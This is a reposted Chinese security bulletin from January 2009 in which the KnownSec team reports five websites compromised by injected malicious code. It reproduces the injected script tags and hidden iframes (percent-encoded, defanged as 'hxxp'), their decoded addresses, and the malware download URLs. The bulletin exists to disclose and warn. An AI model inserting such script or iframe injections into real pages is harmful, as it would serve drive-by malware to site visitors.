黑基网 首页 资讯 安全圈 查看内容

2009年1月4日挂马简报

2009-1-4 15:23| 投稿: blue

摘要:   最后更新时间:Sat, 4 Jan 2009 0:01:01 (GMT+8)  ________________________________________  知道创宇安全团队(KnownSe...
  最后更新时间:Sat, 4 Jan 2009 0:01:01 (GMT+8)  ________________________________________  知道创宇安全团队(KnownSec team)于今天捕获以下网站被植入恶意代码:诺科电子网上购物、MM公寓、西南财经大学、????、北京商网。  诺科电子网上购物(www.nkdz.net)多处被植入恶意代码:  <script src=hxxp://%76%76%6b%32%2d%63%6e></script>  <script language=”javascript” src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog” mce_src=”hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog”></script>  <script src=hxxp://%68%68%6a%32%2d%63%6e></script>  恶意链接地址解密后为:  hxxp://vvk2-cn(无效)  hxxp://office2.viens.la/office.js?do=list&uid=193&type=blog  hxxp://hhj2-cn(无效)  通过漏洞攻击,最终下载病毒:  hxxp://www.67uy66.cn/1.css  hxxp://www.oiuytr.net/new/a266.css  MM公寓(www.mm-home.cn)底部被植入恶意代码:  <script src=hxxp://%75%69%6E%35%2E%63%6E></script>  <script src=hxxp://%63%63%68%31%2E%63%6E></script>  <iframe src=hxxp://www.zgynkmk.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.rxgsslla.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.rxgssllt.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.zgcgsslle.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.falalioo.cn/b3.htm width=50 height=0 border=0></iframe>  恶意链接地址解密后为:  hxxp://uin5.cn  hxxp://cch1.cn  hxxp://www.zgynkmk.cn/b3.htm  hxxp://www.rxgsslla.cn/b3.htm  hxxp://www.rxgssllt.cn/b3.htm  hxxp://www.zgcgsslle.cn/b3.htm  hxxp://www.falalioo.cn/b3.htm  通过漏洞攻击,最终下载病毒:  hxxp://d.ko546.com/down/360Safe.exe  hxxp://d.ko546.com/new/a1.css  西南财经大学(kyc.swufe.edu.cn)被植入恶意代码:  <script src=hxxp://www.8wu.com/1.js></script>  通过漏洞攻击,最终下载病毒:  hxxp://qq.18i16.net/sina.css  hxxp://qq.18i16.net/baidu.cab  hxxp://qq.18i16.net/exe1/ce.css  hxxp://qq.18i16.net/exe1/ms.css  hxxp://qq.18i16.net/exe1/a15.css  hxxp://qq.18i16.net/exe1/bf.css  hxxp://qq.18i16.net/exe1/re.css  hxxp://121.12.173.218/exe1/cx.css  ????(www.sunlux.net)底部被植入恶意代码:  <script src=hxxp://%61%76%65%32%2E%63%6E></script>  <script src=hxxp://%61%76%65%33%2E%63%6E></script>  <iframe src=hxxp://www.wrmfwk.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.wrmfwj.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.wrmfwu.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.wrmfww.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.hryspap.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.cznylsf.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe frameborder=0 src=”hxxp://caixia88.hrdns.net/index.htm” mce_src=”hxxp://caixia88.hrdns.net/index.htm” width=0 height=0 scrolling=no></iframe>  <script src=hxxp://%75%69%6E%34%2E%63%6E></script>  <script src=hxxp://%63%63%68%31%2E%63%6E></script>  <script src=hxxp://%76%76%6B%31%2E%63%6E></script>  <iframe src=hxxp://www.falaliqq.cn/b3.htm width=50 height=0 border=0></iframe>  恶意链接地址解密后为:  hxxp://ave2.cn  hxxp://ave3.cn  hxxp://www.wrmfwk.cn/b3.htm(无效)  hxxp://www.wrmfwj.cn/b3.htm  hxxp://www.wrmfwi.cn/b3.htm  hxxp://uin1.cn  hxxp://www.wrmfwu.cn/b3.htm  hxxp://uin2.cn  hxxp://www.hryspap.cn/b3.htm  hxxp://www.cznylsf.cn/b3.htm  hxxp://caixia88.hrdns.net/index.htm(无效)  hxxp://uin4.cn  hxxp://uin5.cn  hxxp://cch1.cn  hxxp://cch2.cn  hxxp://vvk1.cn(无效)  hxxp://hhj1.cn(无效)  hxxp://vvk2.cn  hxxp://www.falaliqq.cn/b3.htm  通过漏洞攻击,最终下载病毒:  hxxp://d.ko546.com/down/360Safe.exe  hxxp://d.ko546.com/new/a1.css  北京商网(www.bjbusiness.com.cn/missvideo/index.html)底部被植入恶意代码:  <script src=hxxp://%61%76%65%31%2E%63%6E></script>  <iframe src=hxxp://www.pdh001.cn/b3.htm width=50 height=0 border=0></iframe>  <script src=hxxp://%61%76%65%32%2E%63%6E></script>  <iframe src=hxxp://www.wyf005.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.wyf010.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.hrz005.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.union501.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.eqw009.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.wrmfwd.cn/b3.htm width=50 height=0 border=0></iframe>  <iframe src=hxxp://www.wrmfwk.cn/b3.htm width=50 height=0 border=0></iframe>  <script src=hxxp://%61%76%65%33%2E%63%6E></script>  <iframe src=hxxp://www.wrmfwi.cn/b3.htm width=50 height=0 border=0></iframe>  <script src=hxxp://%75%69%6E%31%2E%63%6E></script>  <script src=hxxp://%75%69%6E%32%2E%63%6E></script>  <script src=hxxp://%75%69%6E%33%2E%63%6E></script>  <script src=hxxp://%75%69%6E%35%2E%63%6E></script>  <script src=hxxp://%76%76%6B%31%2E%63%6E></script>  <script src=hxxp://%76%76%6B%32%2E%63%6E></script>  恶意链接地址解密后为:  hxxp://ave1.cn  hxxp://www.pdh001.cn/b3.htm(无效)  hxxp://ave2.cn  hxxp://www.wyf005.cn/b3.htm  hxxp://www.wyf010.cn/b3.htm  hxxp://www.hrz005.cn/b3.htm  hxxp://www.union501.cn/b3.htm  hxxp://www.eqw009.cn/b3.htm  hxxp://www.wrmfwd.cn/b3.htm  hxxp://www.wrmfwk.cn/b3.htm(无效)  hxxp://ave3.cn  hxxp://uin1.cn  hxxp://www.wrmfwi.cn/b3.htm  hxxp://uin2.cn  hxxp://uin3.cn  hxxp://uin4.cn  hxxp://uin5.cn  hxxp://cch1.cn  hxxp://vvk1.cn(无效)  hxxp://hhj1.cn(无效)  hxxp://vvk2.cn  通过漏洞攻击,最终下载病毒:  hxxp://d.ko546.com/down/360Safe.exe  hxxp://d.ko546.com/new/a1.css  推荐的应对方法: 安装365门神软件,对IE浏览器在打开网站的时候进行保护,拦截来自网络带有恶意代码的网页攻击。使用帮助和下载:http://365menshen.com
小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论


新出炉

返回顶部